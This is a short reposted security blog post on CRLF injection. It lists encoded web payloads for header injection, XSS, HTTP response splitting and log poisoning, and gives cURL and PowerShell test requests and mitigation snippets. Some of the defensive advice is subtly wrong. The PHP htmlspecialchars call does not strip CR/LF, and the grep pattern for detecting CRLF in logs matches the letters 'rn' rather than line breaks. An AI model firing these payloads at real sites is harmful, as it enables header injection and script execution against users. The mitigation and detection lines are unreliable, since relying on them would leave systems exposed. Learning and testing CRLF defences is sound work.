CRLF Injection Payloads

By /

Listen to this Post

CRLF (Carriage Return Line Feed) injection is a web security vulnerability that occurs when an attacker injects CRLF sequences into input fields, leading to HTTP response splitting, log poisoning, or other malicious actions. Below are key payloads and techniques to test and mitigate CRLF vulnerabilities.

Common CRLF Injection Payloads

1. Basic CRLF Injection

%0D%0ASet-Cookie: malicious=payload

This injects a new HTTP header into the response.

2. XSS via CRLF

%0D%0A%0D%0A<script>alert('XSS')</script>

Combines CRLF with JavaScript execution.

3. HTTP Response Splitting

%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A%0D%0A

<h1>Hacked</h1>

Splits the response into multiple parts.

4. Log Poisoning

%0D%0AUser-Agent:%20BadBot%0D%0AX-Forwarded-For:%20127.0.0.1

Manipulates server logs.

You Should Know: Testing & Mitigation

Testing CRLF with cURL

curl -v "http://example.com/search?q=%0D%0AInjected-Header:test"

Check the response headers for injected content.

Automated Scanning with Burp Suite

1. Intercept a request.

2. Insert CRLF payloads in parameters.

3. Forward and observe responses.

Mitigation in Web Applications

  • Input Validation: 
    import re
cleaned_input = re.sub(r'[\r\n]', '', user_input)
  • Encode Output: 
    header(htmlspecialchars($header, ENT_QUOTES, 'UTF-8'));
  • Use Secure Frameworks:
  • Django (auto-escapes headers).
  • Express.js (helmet middleware).

Linux Command for Log Analysis

grep -E "\r\n" /var/log/nginx/access.log

Detects CRLF sequences in logs.

Windows Command for HTTP Server Testing

Invoke-WebRequest -Uri "http://localhost/?param=%0D%0AHacked:true" -Headers @{"User-Agent"="CRLF-Test"}

What Undercode Say

CRLF injection remains a critical threat due to improper input sanitization. Always:
– Validate user inputs.
– Encode outputs in HTTP headers.
– Monitor logs for anomalies.
– Use tools like Burp Suite, ZAP, or cURL for testing.

Expected Output:

HTTP/1.1 200 OK 
Injected-Header: test

Relevant URLs:

  1. Z-Security Courses
  2. CRLF Injection Explained (OWASP)

(End of )

References:

Reported By: Zlatanh Crlf – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: